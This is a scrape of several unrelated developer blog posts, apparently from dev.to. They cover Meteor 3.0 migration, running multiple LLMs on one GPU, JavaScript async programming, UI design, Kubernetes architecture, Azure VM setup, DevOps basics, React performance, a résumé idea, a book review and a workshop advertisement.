This especially involves any database interaction, the backbone of most MeteorJS apps. It also applied to any package with reliance on `fibers`. Consider the following example:
```js
import { Meteor } from 'meteor/meteor'
import { Mongo } from 'meteor/mongo'
const Tasks = new Mongo.Collection('tasks')
```
Before 3.0, using fibers
```js
Meteor.methods({
updateTask ({ _id, text }) {
const taskDoc = Tasks.findOne({ _id })
if (taskDoc.createdBy !== this.userId) {
throw new Meteor.Error(403, 'permission denied', 'not owner')
}
return Tasks.update({ _id }, { $set: { text }})
}
})
```
After 3.0, using async/await
```js
Meteor.methods({
async updateTask ({ _id, text }) {
const taskDoc = await Tasks.findOneAsync({ _id })
if (taskDoc.createdBy !== this.userId) {
throw new Meteor.Error(403, 'permission denied', 'not owner')
}
return Tasks.updateAsync({ _id }, { $set: { text }})
}
})
```
It looks not that much but beware that it breaks *isomorphism*, another core concept of MeteorJS, where code can be **shared across server and client**. This, combined with the size and structure of medium or large-sized apps can result in a migration effort of multiple months, involving multiple developers.
Another big task was to resolve the version conflicts in the packages, since all of the MeteorJS core packages were updated to a new major version. Thankfully, the Meteor Community Ambassadors ([StoryTellerCZ](https://dev.to/storytellercz), Alim Gafar, and I) collaborated to create a detailed guide covering this topic:
{% embed https://youtube.com/live/hGoxWQNIrfs?feature=share %}
---
## Conclusion
The next major MeteorJS release is coming in a few weeks, and of course, there will be changes if you have Meteor apps and packages. To help you prepare for all of them, I have made a list below to help you.
---
## Resources to help you migrate your Meteor app
- Read the [migration guide](https://guide.meteor.com/3.0-migration)
- Read on how to [prepare your 2.x app for async](https://guide.meteor.com/prepare-meteor-3.0)
- Read the [new meteor 3.0 docs](https://v3-docs.meteor.com/)
- Read on [extended Node 14 support with security patches](https://guide.meteor.com/using-node-v14.21.4)
- Subscribe to the [Meteor Community Dispatches podcast](https://www.youtube.com/channel/UCqi1HYAD1Mm2vZtAn3-H-Cw) to stay up to date
- [Consult StorytellerCZ](https://cal.com/storyteller), Meteor ambassador and one of the (if not the) most active contributors from the community for help
- Join the [Meteor forums](https://forums.meteor.com/) and ask for help and guidance
I hope you enjoy this read and see you on Meteor Community!
---
## About me 👋
I regularly publish articles about **MeteorJS** and **JavaScript** here on dev.to. I also recently co-hosted the [weekly MeteorJS Community Podcast](https://www.youtube.com/@meteorjscommunity), which covers the latest in Meteor and the community.
You can also find me (and contact me) on [GitHub](https://github.com/jankapunkt/), [Twitter/X](https://twitter.com/kuester_jan) and [LinkedIn](https://www.linkedin.com/in/jan-kuester/).
If you like what you read and want to support me, you can [sponsor me on GitHub](https://github.com/jankapunkt) or buy me a book from [my Amazon wishlist](https://www.amazon.de/-/en/hz/wishlist/ls/12YMIY0QNH9TK?ref_=list_d_wl_lfu_nav_1).
| jankapunkt |
1,899,190 | Running multiple LLMs on a single GPU | In recent weeks, I have been working on projects that utilize GPUs, and I have been exploring ways to... | 0 | 2024-06-24T18:12:37 | https://dev.to/shannonlal/running-multiple-llms-on-a-single-gpu-255o | llm, gpu, ai, python | In recent weeks, I have been working on projects that utilize GPUs, and I have been exploring ways to optimize their usage. To gain insights into GPU utilization, I started by analyzing the memory consumption and usage patterns using the nvidia-smi tool. This provided me with a detailed breakdown of the GPU memory and usage for each application.
One of the areas I have been focusing on is deploying our own LLMs. I noticed that when working with smaller LLMs, such as those with 7B parameters, on an A100 GPU, they were only consuming about 8GB of memory and utilizing around 20% of the GPU during inference. This observation led me to investigate the possibility of running multiple LLM processes in parallel on a single GPU to optimize resource utilization.
To achieve this, I explored using Python's multiprocessing module and the spawn method to launch multiple processes concurrently. By doing so, I aimed to efficiently run multiple LLM inference tasks in parallel on a single GPU. The following code demonstrates the approach I used to set up and execute multiple LLMs on a single GPU.
```
MAX_MODELS = 3
def load_model(model_name: str, device: str):
model = AutoModelForCausalLM.from_pretrained(
model_name,
return_dict=True,
load_in_8bit=True,
device_map={"":device},
trust_remote_code=True,
)
tokenizer = AutoTokenizer.from_pretrained(model_name)
tokenizer.pad_token = tokenizer.eos_token
return model, tokenizer
def inference(model, prompt: str):
text = model.process_and_generate(prompt, params={"max_new_tokens": 200, "temperature": 1.0})
return text
def process_task(task_queue, result_queue):
model = load_model("tiiuae/falcon-7b-instruct", device="cuda:0")
while True:
task = task_queue.get()
if task is None:
break
prompt = task
start = time.time()
summary = inference(model, prompt)
print(f"Completed inference in {time.time() - start}")
result_queue.put(summary)
def main():
task_queue = multiprocessing.Queue()
result_queue = multiprocessing.Queue()
prompt = "" # The prompt you want to execute
processes = []
for _ in range(MAX_MODELS):
process = multiprocessing.Process(target=process_task, args=(task_queue, result_queue ))
process.start()
processes.append(process)
start = time.time()
# I want to run this 3 times for each of the models
for _ in range(MAX_MODELS*3):
task_queue.put((prompt))
results = []
for _ in range(MAX_MODELS*3):
result = result_queue.get()
results.append(result)
end = time.time()
if __name__ == "__main__":
multiprocessing.set_start_method("spawn")
main()
```
The following is a quick summary of some of the tests that I ran.
| GPU | # of LLMs | GPU Memory | GPU Usage | Average Inference Time |
|----------------|-----------|------------|-----------|------------------------|
| A100 with 40GB | 1 | 8 GB | 20% | 12.8 seconds |
| A100 with 40GB | 2 | 16 GB | 95% | 16 seconds |
| A100 with 40GB | 3 | 32 GB | 100% | 23.2 seconds |
Running multiple LLM instances on a single GPU can significantly reduce costs and increase availability by efficiently utilizing the available resources. However, it's important to note that this approach may result in a slight performance degradation, as evident from the increased average inference time when running multiple LLMs concurrently. If you have any other ways of optimizing GPU usage or questions on how this works feel free to reach out.
Thanks | shannonlal |
1,899,207 | Day 21 of 30 of JavaScript | Hey reader👋 Hope you are doing well😊 In the last post we have talked about an introduction to... | 0 | 2024-06-24T18:11:25 | https://dev.to/akshat0610/day-21-of-30-of-javascript-2hdp | webdev, javascript, beginners, tutorial | Hey reader👋 Hope you are doing well😊
In the last post we have talked about an introduction to Asynchronous and Synchronous JavaScript. In this post we are going to discuss more Asynchronous JavaScript.
So let's get started🔥
## Why we need Asynchronous Programming?
Consider a long running synchronous function (i.e. the next line will get executed only after the previous line has completed executing). Suppose generating prime numbers in range [1,1e10] -:
`
// Function to check if a number is prime
function isPrime(num) {
if (num <= 1) return false;
if (num <= 3) return true;
if (num % 2 === 0 || num % 3 === 0) return false;
for (let i = 5; i * i <= num; i += 6) {
if (num % i === 0 || num % (i + 2) === 0) return false;
}
return true;
}
// Generate prime numbers in a smaller range for demonstration
let primes = [];
let rangeStart = 1;
let rangeEnd = 1e10;
for (let i = rangeStart; i <= rangeEnd; i++) {
if (isPrime(i)) {
primes.push(i);
}
}
// Print the primes
console.log("Prime numbers:", primes);
// Print "Hello, World!"
console.log("Hello, World!");
`
Now seeing such a large range this program is going to take large amount of time and resources and the line "Hello World" will be printed after the checking and printing of prime numbers. Suppose we had some important function instead of printing "Hello World" here.This is going to create problem. To resolve this problem we need Asynchronous Programming.
> Asynchronous programming allows our code to run in the background without blocking the execution of other code.
## Example

So here you can see that last line is printed before "Inside timeout". This is an example of Asynchronous operation.
## Handling Asynchronous Operations
JavaScript provides several ways to handle asynchronous operations, including **callbacks**, **promises**, and **async/await**.
**Callbacks**
Callbacks are the original way to handle asynchronous operations in JavaScript. A callback is a function passed as an argument to another function, to be executed once the asynchronous operation completes.

So you can see that `fetchData` takes a callback function as an argument that fetches the data and is excuted after the timeout but in this delay the other code runs as it is.
While callbacks are simple to understand, they can lead to "callback hell," where nested callbacks become difficult to read and maintain. We will read more about it in later blogs.
**Promises**
Promises provide a more robust way to handle asynchronous operations, allowing you to chain operations and handle errors more gracefully. A promise represents a value that may be available now, or in the future, or never.
To create a promise, we'll create a new instance of the Promise object by calling the Promise constructor.
The constructor takes a single argument: a function called executor. The "executor" function is called immediately when the promise is created, and it takes two arguments: a resolve function and a reject function.


A JavaScript Promise object can be:
1. Pending -> initial state, neither fulfilled nor rejected.
2. Fulfilled -> meaning that an operation was completed successfully.
3. Rejected -> meaning that an operation failed.

The `fetchData` function returns a new promise, which simulates an asynchronous task using `setTimeout`. Inside the `setTimeout` function, a delay of 2000 milliseconds (2 seconds) is introduced to mimic a time-consuming operation, such as fetching data from a server. After the delay, the promise is resolved with the string "Hello, World!" as the data.
When `fetchData` is called, it initiates the asynchronous operation and returns a promise. The `.then()` method is used to handle the successful resolution of the promise, logging the retrieved data `("Hello, World!")` to the console. Additionally, the `.catch()` method is included to handle any potential errors that might occur during the promise's execution, though in this example, no error is expected. This approach ensures that the main thread remains non-blocked while waiting for the asynchronous task to complete, enhancing the responsiveness of the application.
**Async/Await**
Async/await is built on top of promises and allows us to write asynchronous code that looks synchronous. Async/Await is a feature that allows us to write asynchronous code in a more synchronous, readable way.
**async** is a keyword that is used to declare a function as asynchronous.
**await** is a keyword that is used inside an async function to pause the execution of the function until a promise is resolved.

The `getData` function is declared as an asynchronous function using the async keyword.Inside the asynchronous function, we use the await keyword to wait for the fetch function to complete and retrieve some data from an API.Once the data is retrieved, we use await again to wait and parse the retrieved data as JSON.And then finally, we log the data to the console.
"Aync/Await" is a powerful tool for handling asynchronous operations. It allows for more readable and maintainable code by eliminating the need for callbacks and providing a more intuitive way to handle asynchronous operations.
So this is it for this blog in the next blog we will know more about callbacks. I hope you have understood this blog. Follow me for more.
Thankyou 🩵 | akshat0610 |
1,899,206 | Understanding Visual Noise in UI/UX Design | Day 6: Learning UI/UX Design 👋 Hello, Dev Community! I'm Prince Chouhan, a B.Tech CSE student with... | 0 | 2024-06-24T18:10:12 | https://dev.to/prince_chouhan/understanding-visual-noise-in-uiux-design-1f36 | Day 6: Learning UI/UX Design
👋 Hello, Dev Community!
I'm Prince Chouhan, a B.Tech CSE student with a passion for UI/UX design. Today, I learned about Visual Noise in design.
---
📚 Today's Learning Highlights:
Concept Overview:
Visual noise refers to unnecessary or distracting elements that hinder focus on important content, degrading the user experience.
Forms of Visual Noise:
1. Cluttered Layout: Overcrowded elements confuse users. (Example: Too many buttons/links in one area)
2. Excessive Typography: Too many fonts/styles create chaos. (Example: Mixing serif and sans-serif fonts excessively)
3. Distracting Animations: Overuse can divert attention. (Example: Too frequent/elaborate animations)
4. Busy Backgrounds: Complex backgrounds compete for attention. (Example: Highly detailed images interfering with text)
---
Importance of Clear Visual Hierarchy:
- Use of White Space: Reduces clutter, highlights content.
- Consistent Styling: Cohesive look and feel.
- Good Alignment: Structured and orderly layout.
---
Benefits of Reducing Visual Noise:
- Enhanced user experience.
- Increased usability.
- Better readability.
---
By minimizing visual noise, designers create aesthetically pleasing and functional interfaces, leading to a more satisfying user experience.
📢 Community Engagement:
How do you ensure your designs are clean and user-friendly? Share your tips in the comments!
---
💬 Quote of the Day:
"Simplicity is the ultimate sophistication." - Leonardo da Vinci

Thank you for reading! Stay tuned for more updates on my UI/UX design journey.
#UIUXDesign #LearningJourney #DesignThinking #PrinceChouhan #VisualNoise #LinkedInLearning | prince_chouhan | |
1,899,204 | From Novice to Ninja: Embarking on the Full Stack Developer Journey with Project-Based Learning | Hello community... Recently i decided to take the software engineering path and want to be a full... | 0 | 2024-06-24T18:08:12 | https://dev.to/kimaninelson/from-novice-to-ninja-embarking-on-the-full-stack-developer-journey-with-project-based-learning-55h0 | Hello community... Recently i decided to take the software engineering path and want to be a full stack developer,ambitious right?
But i am determined to this and be one great and innovative software developer.Now i want to learn by starting out from web development and i want my learning to be project based for my understanding as well as develop proper development skills and would like to ask for assistance and tips from the pro guys on this space to help me grow from an amateur shy noobie to a proclaimed and expert in the field.
All help will certainly be welcomed as well as constructive criticism paired with collaborations
| kimaninelson | |
1,898,612 | How to create an Azure Windows Virtual Machine | Creating an Azure Windows Virtual Machine involves configuring basic settings, disks, networking, and... | 0 | 2024-06-24T18:04:02 | https://dev.to/temidayo_adeoye_ccfea1cab/how-to-create-an-azure-windows-virtual-machine-3l21 | cloudcomputing, azure, virtualmachine | Creating an Azure Windows Virtual Machine involves configuring basic settings, disks, networking, and management options. Once deployed, you can connect to your VM using Remote Desktop Protocol (RDP). The Azure portal provides a user-friendly interface to guide you through each step of the process.
Let's get started
## Step 1: Create an Azure Account
If you do not have an azure account sign up for one https://portal.azure.com/
## Step 2: Navigate to the Virtual Machines Section
On the left-hand menu, click on "Virtual machines".
Click on the "Create" button and select "Azure virtual machine.

## Step 3: Choose a subscription and Resource group
Subscription: Choose the Azure subscription you want to use.
Resource Group: Select an existing resource group or create a new one.

## Step 4: Configure the instance details
-
Virtual Machine Name: Enter a name for your VM.
-
Region: Choose the region where you want to deploy the VM.
-
Availability Options: Select the availability options (e.g., no infrastructure redundancy required, availability zone, etc.).
-
Image: Choose "Windows Server" and then select the specific version of Windows Server you need.

## Step 5: Choose a preferred size
Click on "See all sizes" and choose the size of the VM based on your requirements (e.g., DS1_v2, B2s).

## Step 6: Configure the Administrator Account
-
Username: Enter a username for the administrator account.
-
Password: Enter a strong password and confirm it.

## Step 7: Configure Inbound Port Rules
-
choose Allow selected ports and select "RDP (3389)" under the "Select inbound ports" section.

## Step 8: Review and create
Leave the remaining defaults and then select the Review + create button at the bottom of the page to start deployment.

## Step 9: Post-Deployment Steps.
-
Once the deployment is complete, you can connect to your VM:

-
Navigate to the Virtual Machine: Go to the Virtual Machines section in the Azure portal and select your newly created VM.

-
Connect to the VM: Click on the "Connect" button and choose RDP. Download the RDP file and open it.

-
Log in: Use the administrator username and password you configured during the VM setup to log in to the VM.
| temidayo_adeoye_ccfea1cab |
1,899,203 | "Error: Exception in HostFunction: expected 1 arguments, got 0, js engine: hermes" | A post by Danii Calil | 0 | 2024-06-24T18:02:05 | https://dev.to/danii_calil_347dcab190271/error-exception-in-hostfunction-expected-1-arguments-got-0-js-engine-hermes-2h2i | danii_calil_347dcab190271 | ||
1,899,201 | Interactive Resume, Yes? | Hey guys, i'm working on a resume idea to help me land my first programming job. Coming from an... | 0 | 2024-06-24T18:01:05 | https://dev.to/annavi11arrea1/interactive-resume-yes-13p0 | resume, css, animation, interactive |

Hey guys, i'm working on a resume idea to help me land my first programming job. Coming from an artist background, I have this urge to make it fun and exciting. How do we feel about an interactive cube that displays samples of my work? Or what about my profile pic that tumbles down the side of the page as you scroll along?

The tumbling pic says "i'm coming with!" for some added subconscious encouragement to a perspective employer. LOL. I love it. Do you love it? I think a digital resume is a great way to give an example of your skills. Am I a crazy artist lady or is this a great idea? What awesome stuff have you done with your resume? I'd love additional inspiration. A work in progress, not finished. | annavi11arrea1 |
1,899,200 | HOW TO CREATE AND CONNECT TO A LINUX VM USING A PUBLIC KEY. | Azure Virtual Machines (VMs) can be easily created using the Azure portal, a browser-based interface... | 0 | 2024-06-24T17:59:48 | https://dev.to/temidayo_adeoye_ccfea1cab/how-to-create-and-connect-to-a-linux-vm-using-a-public-key-c5i | linux, cloudcomputing, virtualmachine | Azure Virtual Machines (VMs) can be easily created using the Azure portal, a browser-based interface for managing Azure resources. This guide will show you how to deploy a Linux VM running Ubuntu Server 22.04 LTS and connect to it via SSH to install the NGINX web server.
## Step 1: Sign in to Azure
Sign in to the https://portal.azure.com/
## Step 2: Create virtual machine
- Search for Virtual machine

- Select the subscription and resource group

- Select the virtual machine name, region, availability options, security type. Image should be Ubuntu

- Size

-
Under Administrator account, select SSH public key.
In Username enter azureuser.
For SSH public key source, leave the default of Generate new key pair, and then enter VirtualVM2_key for the Key pair name.
Review and create

- On the Create a virtual machine page, you can see the details about the VM you are about to create. When you are ready, select Create.

- Click on download private key and create resource. The file will be download as VirtualVM2_Key.pem. Go ahead and copy the key for the next step

Your
When the deployment is finished, select Go to resource.
On the page for your new VM, select the public IP address and copy it to your clipboard.
## Step 3: Connect to Virtual Machine
- When the deployment is finished, select Go to resource.

- On the page for your new VM, select the public IP address and copy it to your clipboard.
- Create an SSH connection with the VM on your power shell using the following command prompt
The pem key and the public IP address

Respond with a yes

sudo apt-get -y update

sudo apt-get -y install nginx

## Step 4: Open your IP address on your computer

| temidayo_adeoye_ccfea1cab |
1,899,179 | Deep Dive into Kubernetes Architecture | Hello everyone, welcome back to my blog series on CKA 2024 in this fifth entry of the series, we'll... | 0 | 2024-06-24T17:59:30 | https://dev.to/jensen1806/deep-dive-into-kubernetes-architecture-5fg2 | kubernetes, containers, docker | Hello everyone, welcome back to my blog series on CKA 2024 in this fifth entry of the series, we'll be diving deep into Kubernetes architecture, focusing on the control plane components, their roles, and how they work. If you're new to containers and Kubernetes, I highly recommend reading the previous posts first.

## Understanding Kubernetes Architecture
Kubernetes architecture can seem overwhelming at first glance, but by the end of this post, you should clearly understand its components and their functions. The architecture is divided into two main parts: the control plane and the worker nodes.
### What is a Node?
In Kubernetes, a node is essentially a virtual machine (VM) that runs your components, workloads, and administrative functions. Nodes are categorized into control plane nodes and worker nodes.
#### Control Plane
The control plane or master node is like the board of directors in a company. It provides instructions and management but doesn’t perform the actual work. It hosts several critical components:
1. **API Server**: All operations on the cluster are executed via the API server. It handles RESTful calls, validates them, and processes them. Only the API server communicates with etcd to store and retrieve cluster state and configuration.
2. **Scheduler**: The scheduler assigns pods to nodes based on resource availability and other defined policies. It continuously monitors the API server for new pods without a node assignment and allocates resources accordingly.
3. **Controller Manager**: The controller manager runs various controllers in Kubernetes. Controllers are responsible for noticing and responding when the actual state deviates from the desired state.
4. **etcd**: etcd is a consistent and highly-available key-value store used as Kubernetes’ backing store for all cluster data. It stores configuration data, secrets, and the state of all resources in the cluster. Only the API server interacts directly with etcd.

#### Worker Nodes
Worker nodes are where the actual work happens. They run your applications and workloads encapsulated in pods. Each worker node contains the following components:
1. **Kubelet**: An agent that ensures the containers are running in a pod. It receives instructions from the API server and manages the pods' lifecycle.
2. **Kube-proxy**: Manages network rules on each node. It allows for network communication to your pods from network sessions inside or outside of your cluster.
3. **Pods**: The smallest deployable units that can be created, managed, and run in Kubernetes. Each pod encapsulates one or more containers.
### How Control Plane Components Work Together
To better understand how these components work together, let's walk through an example of scheduling a pod:
- **User Request**: A user or DevOps engineer uses kubectl, a command-line tool, to request the creation of a pod.
- **API Server**: The request is sent to the API server, which authenticates and validates it.
- **etcd Update**: The API server updates the etcd store with the new pod configuration.
- **Scheduler**: The scheduler detects the new pod and assigns it to a suitable node based on resource availability.
- **Kubelet**: The kubelet on the assigned node receives the pod specification from the API server and ensures the container(s) are running.
- **Status Update**: The kubelet reports the status back to the API server, which updates the etcd store with the current state.
This process ensures that workloads are efficiently scheduled and managed across the cluster.
### Conclusion
Understanding Kubernetes architecture and its components is crucial for managing and scaling your applications effectively. The control plane components like the API server, scheduler, controller manager, etcd, work in unison to manage the cluster state, while worker nodes run the actual applications.
If you have any questions or need further clarification, feel free to leave a comment. Stay tuned for the next entry in our CKA 2024 series!
For further reference, check out the detailed YouTube video here:
{% embed https://www.youtube.com/watch?v=SGGkUCctL4I&list=WL&index=19 %} | jensen1806 |
1,883,890 | Curses, space heists and found family - My freefall into Jessie Kwak fandom | It started with a short story, and now I can't get enough. | 0 | 2024-06-24T17:59:27 | https://dev.to/ajkerrigan/curses-space-heists-and-found-family-my-freefall-into-jessie-kwak-fandom-4oj0 | books | ---
title: Curses, space heists and found family - My freefall into Jessie Kwak fandom
published: true
description: It started with a short story, and now I can't get enough.
tags: books
---
- [My Jessie Kwak Jumpstart](#my-jessie-kwak-jumpstart)
- [But Wait, There's More!](#but-wait-theres-more)
- [...And More to Come (Kickstarter)!](#and-more-to-come-kickstarter)
***TL;DR:*** *I've fallen in love with Jessie Kwak's writing - character-rich speculative fiction stories, many of which take place in the same expanding world. I gush in the hope that there are other folks who will love her work but haven't come across it yet.*
### My Jessie Kwak Jumpstart
A while back I read the collection [Dispatches from Anarres](https://www.powells.com/book/dispatches-from-anarres-9781942436485) - stories from a bunch of Portland authors in tribute to Ursula K. Le Guin. As with most collections, a few stories stuck with me long after I finished. Atop that list was _Black as Thread_, from an author I had never read before. I love it when that happens! Jessie Kwak's teaser for the story [on her site](https://www.jessiekwak.com/short-stories/) is:
> Sewing curses into the boots of foreign occupiers may be helping win the war, but what does it do to the soul?
Coming as part of a Le Guin tribute, the story immediately reminded me of the [Carrier Bag Theory of Fiction](https://theanarchistlibrary.org/mirror/u/uk/ursula-k-le-guin-the-carrier-bag-theory-of-fiction.pdf) essay. Because sure there's that word "war", but the story isn't about battles and commanders and heroes. As the Carrier Bag essay notes:
> That is why I like novels: instead of heroes they have people in them.
Something about the world, the characters, the writing style... it hooked me hard, and I had to find more from the author who created it.
### But Wait, There's More!
It's a beautiful thing - finding an author that you can connect with immediately, and learning that there are several books already out in the world waiting for you. Jessie provides a couple [recommended entry points](https://store.jessiekwak.com/pages/jessie-kwak-book-reading-order) for her fiction, which I found helpful. I latched onto the [Nanshe Chronicles](https://store.jessiekwak.com/collections/nanshe-chronicles) because... how could I not:
> Are you looking for fun spaceship-based adventures that read like an episode of your favorite TV show — complete with heists, trick flying, witty banter, and a crew of wary newcomers slowly transforming into found family?
>
> (Thank Firefly, Cowboy Bebop, and Leverage with a splash of Indiana Jones.)
Leverage doesn't mean anything to me, but the rest combine nicely and feel spot-on in retrospect. I found a lot of _Expanse_ vibes in the series too, including one particular trope that surfaced in both series (for what it's worth, I vastly prefer how it was handled in the Nanshe Chronicles).
There's a certain optimism/pessimism slider that's tough to nail, particularly in speculative fiction. Some feels willfully pessimistic and depressing enough that it's a slog to read. Go too far the other way, and things are so happy huggy that I can't suspend disbelief long enough to enjoy a book. The Nanshe Chronicles hits a sweet spot - the world isn't perfect, but I have people to love and root for.
### ...And More to Come (Kickstarter)!
I've read the Bulari Saga and all that's available from the Nanshe Chronicles so far (the two series take place in the same world). The thriller _From Earth and Bone_ had a totally different vibe, but worked for me also.
And today there's a [Kickstarter launching](https://www.kickstarter.com/projects/jessiekwak/bulari-saga-travel-guide) for a collection that will dig deeper into the world of the [Bulari Saga](https://www.jessiekwak.com/bulari-saga/). It's intended as a love letter to fans, particularly those who have supported the series since it launched in 2019. It wasn't on my radar then, but I'm so glad it is now. And I hope this post reaches a few eyes that will love these stories as much as I do.
Cheers folks. One more thought from that Carrier Bag essay to send you off on your travels:
> Science fiction properly conceived, like all serious fiction, however funny, is a way of trying to describe what is in fact going on, what people actually do and feel, how people relate to everything else in this vast stack, this belly of the universe, this womb of things to be and tomb of things that were, this unending story.
| ajkerrigan |
1,898,156 | Speed Up Your React App: Essential Performance Optimization Tips | In this article, we'll explore practical and easy-to-implement strategies to boost the performance of... | 0 | 2024-06-24T17:58:30 | https://dev.to/dev_habib_nuhu/speed-up-your-react-app-essential-performance-optimization-tips-4dkd | javascript, webdev, react, tutorial | In this article, we'll explore practical and easy-to-implement strategies to boost the performance of your React applications. From optimizing component rendering to leveraging React's built-in hooks and tools, you'll learn how to make your app faster and more efficient. Whether you're a beginner or an experienced developer, these tips will help you deliver a smoother user experience.
**1. Use React.memo to Prevent Unnecessary Re-renders**
If you have a component that receives props but doesn’t always need to re-render when its parent component re-renders, wrap it with React.memo.
```
import React from 'react';
const MyComponent = React.memo(({ data }) => {
console.log('Rendered');
return <div>{data}</div>;
});
export default MyComponent;
```
`React.memo` checks if the props have changed, and if they haven't, it skips the re-render. This is particularly useful for functional components.
**2. Implement Lazy Loading for Code Splitting**
Use `React.lazy` and `Suspense` to load components only when they are needed.
```
import React, { Suspense } from 'react';
const LazyComponent = React.lazy(() => import('./LazyComponent'));
function App() {
return (
<div>
<Suspense fallback={<div>Loading...</div>}>
<LazyComponent />
</Suspense>
</div>
);
}
export default App;
```
Lazy loading delays the loading of components until they are actually needed, which can significantly reduce the initial load time of your app.
**3. Use the useCallback Hook to Memoize Functions**
Wrap your event handlers or other functions in `useCallback` to ensure they are only recreated when necessary.
```
import React, { useState, useCallback } from 'react';
function App() {
const [count, setCount] = useState(0);
const handleClick = useCallback(() => {
setCount(prevCount => prevCount + 1);
}, []);
return (
<div>
<p>Count: {count}</p>
<button onClick={handleClick}>Increment</button>
</div>
);
}
export default App;
```
The `useCallback` hook memoizes functions to prevent them from being recreated on every render. This is especially useful when passing functions to child components to prevent unnecessary re-renders.
**4. Optimize List Rendering with React Virtualized**
For rendering long lists, use libraries like `react-virtualized` to render only the visible items.
```
import React from 'react';
import { List } from 'react-virtualized';
const rowRenderer = ({ index, key, style }) => (
<div key={key} style={style}>
Row {index}
</div>
);
function VirtualizedList() {
return (
<List
width={300}
height={300}
rowCount={1000}
rowHeight={20}
rowRenderer={rowRenderer}
/>
);
}
export default VirtualizedList;
```
`react-virtualized` helps in rendering only the rows that are visible in the viewport, reducing the performance overhead associated with rendering long lists.
**5. Defer Updates with useDeferredValue**
Use `useDeferredValue` to delay updates to non-urgent parts of the UI, allowing the more critical updates to be prioritized.
```
import React, { useState, useDeferredValue } from 'react';
function App() {
const [input, setInput] = useState('');
const deferredInput = useDeferredValue(input);
const handleChange = (e) => {
setInput(e.target.value);
};
return (
<div>
<input type="text" value={input} onChange={handleChange} />
<SlowComponent value={deferredInput} />
</div>
);
}
function SlowComponent({ value }) {
// Simulating a component that takes time to render
const startTime = performance.now();
while (performance.now() - startTime < 200) {}
return <p>{value}</p>;
}
export default App;
```
`useDeferredValue` helps to prioritize rendering by deferring the update of less important parts of the UI. In the example, the `SlowComponent` renders the deferred input, which means its updates won't block the more immediate rendering of the input field. This improves the perceived performance, making the application feel more responsive.
Optimizing the performance of your React application is essential for providing a fast and responsive user experience. These tips not only enhance the user experience but also make your codebase more maintainable and scalable. Start incorporating these strategies into your projects today and see the difference in your application's performance!
| dev_habib_nuhu |
1,899,195 | Introduction to DevOps: A Simplified Guide | In the ever-evolving field of technology, understanding DevOps is becoming increasingly vital,... | 27,845 | 2024-06-24T17:49:52 | https://dev.to/ansumannn/introduction-to-devops-a-simplified-guide-1420 | devops, introduction, guide, cicd | In the ever-evolving field of technology, understanding DevOps is becoming increasingly vital, especially for those preparing for job interviews or looking to improve their application delivery processes. This article provides a comprehensive overview of DevOps, breaking down its importance, core concepts, and evolution in the tech industry.
## What is DevOps?
### Definition and Goals
DevOps, short for Development and Operations, is a cultural practice that organizations adopt to enhance the efficiency and speed of their application delivery processes. It involves the integration of development and operations teams to improve collaboration and productivity. The main aim of DevOps is to streamline workflows, reduce errors, and deliver high-quality applications more rapidly.
### Importance
Understanding DevOps is crucial for professionals in the tech industry. It’s often a topic in job interviews where you might need to explain its significance and what a DevOps engineer does on a daily basis. By adopting DevOps practices, organizations can achieve faster delivery times, improved product quality, and increased customer satisfaction.
## Key Concepts of DevOps
### Automation
One of the core principles of DevOps is automation. Automating repetitive tasks saves time and reduces the likelihood of human error. For instance, in a chip manufacturing company, automation helps improve production efficiency and quality control. Similarly, in software development, automation enhances the delivery process by ensuring consistent and reliable results.
### Quality Control
Maintaining high code quality is another essential aspect of DevOps. By implementing quality control measures, teams can ensure that the code meets the required standards before it goes into production. This proactive approach helps in identifying and resolving issues early in the development cycle, leading to more stable and reliable applications.
### Continuous Monitoring and Testing
DevOps emphasizes continuous monitoring and testing of applications. This involves keeping a close eye on the application’s performance and conducting regular tests to catch any issues early. Continuous monitoring ensures that any potential problems are identified and addressed promptly, minimizing downtime and improving the overall user experience.
## The DevOps Process
### Current Definition and Evolution
DevOps involves automating processes, maintaining code quality, and continuously monitoring and testing applications to improve delivery. Historically, developers would write code and pass it to a central system managed by DevOps engineers. This process has evolved to become more streamlined, with a greater emphasis on collaboration and efficiency.
### Traditional vs. DevOps Approach
#### Traditional Roles
In the traditional approach, several roles were involved in the application delivery process:
- **System Administrator**: Created the server.
- **Build and Release Engineer**: Deployed the application.
- **Server Administrator**: Managed the application server.
This manual and slow process often led to inefficiencies and delays.
#### Need for Change
The need for a more efficient and streamlined process gave rise to DevOps. The DevOps approach brings together these roles into a single team, improving communication and efficiency. This shift has enabled organizations to deliver applications faster and more reliably.
## Emergence of DevOps
### Single Team Approach
In the modern DevOps approach, a single team handles the entire process, from development to deployment and operations. This unified approach enhances communication and collaboration, leading to more efficient workflows and faster delivery times.
### Role of a DevOps Engineer
A DevOps engineer is responsible for adapting to new tools and continuously improving the delivery process. When introducing yourself as a DevOps engineer, it’s essential to highlight your relevant experience and how you transitioned from previous roles to DevOps.
## Preparing for DevOps Interviews
### Highlight Experience
When preparing for DevOps interviews, it’s important to leverage your background (e.g., system administration) to demonstrate how it applies to DevOps. Be honest about your experience and emphasize your ability to adapt and learn.
### Tools and Technologies
Familiarize yourself with specific tools and technologies commonly used in DevOps, such as GitHub Actions, Kubernetes, Ansible, and Terraform. Mentioning these tools during your interview can showcase your technical proficiency and readiness for the role.
### Research and Discussion
Continual learning and engaging in discussions with other professionals can deepen your understanding of DevOps. Stay updated with the latest trends and best practices to remain competitive in the field.
## Conclusion
Understanding DevOps is crucial for anyone involved in the tech industry. By embracing its principles and practices, organizations can significantly improve their application delivery processes, ensuring faster and more reliable outcomes. Whether you’re preparing for a job interview or looking to enhance your skills, mastering DevOps can open up new opportunities and drive success in your career. | ansumannn |
1,899,194 | Level Up Your Professional Skills with Be10x's Online Workshops | Feeling stuck in your career? Want to impress your boss and land that promotion? Be10x can help! We... | 0 | 2024-06-24T17:49:43 | https://dev.to/sahil_maharanawork_d572d/level-up-your-professional-skills-with-be10xs-online-workshops-109b | ai, be10x, workshop | Feeling stuck in your career? Want to impress your boss and land that promotion? Be10x can help! We offer high-quality, affordable [online workshop](https://be10x.in/ai-tool-workshop/?utm_source=Organic&utm_medium=SEO&utm_campaign=backlink) designed to give you the in-demand skills you need to succeed in today's job market.
**Here's what sets Be10x apart:
**
**Expert-Led Training:** Learn from industry professionals, including IIT Kharagpur alumni.
**Actionable Skills:** Gain practical knowledge you can immediately apply to your work.
**Wide Range of Topics:** Choose from workshops in AI tools, MS Office mastery, data visualization (Power BI), and more!
**Boost Your Resume:** Earn a completion certificate to showcase your newfound skills.
**Supercharge Your Productivity:** Discover time-saving hacks and become an office efficiency expert.
Don't wait! Invest in yourself today. Workshops start at just ₹9!
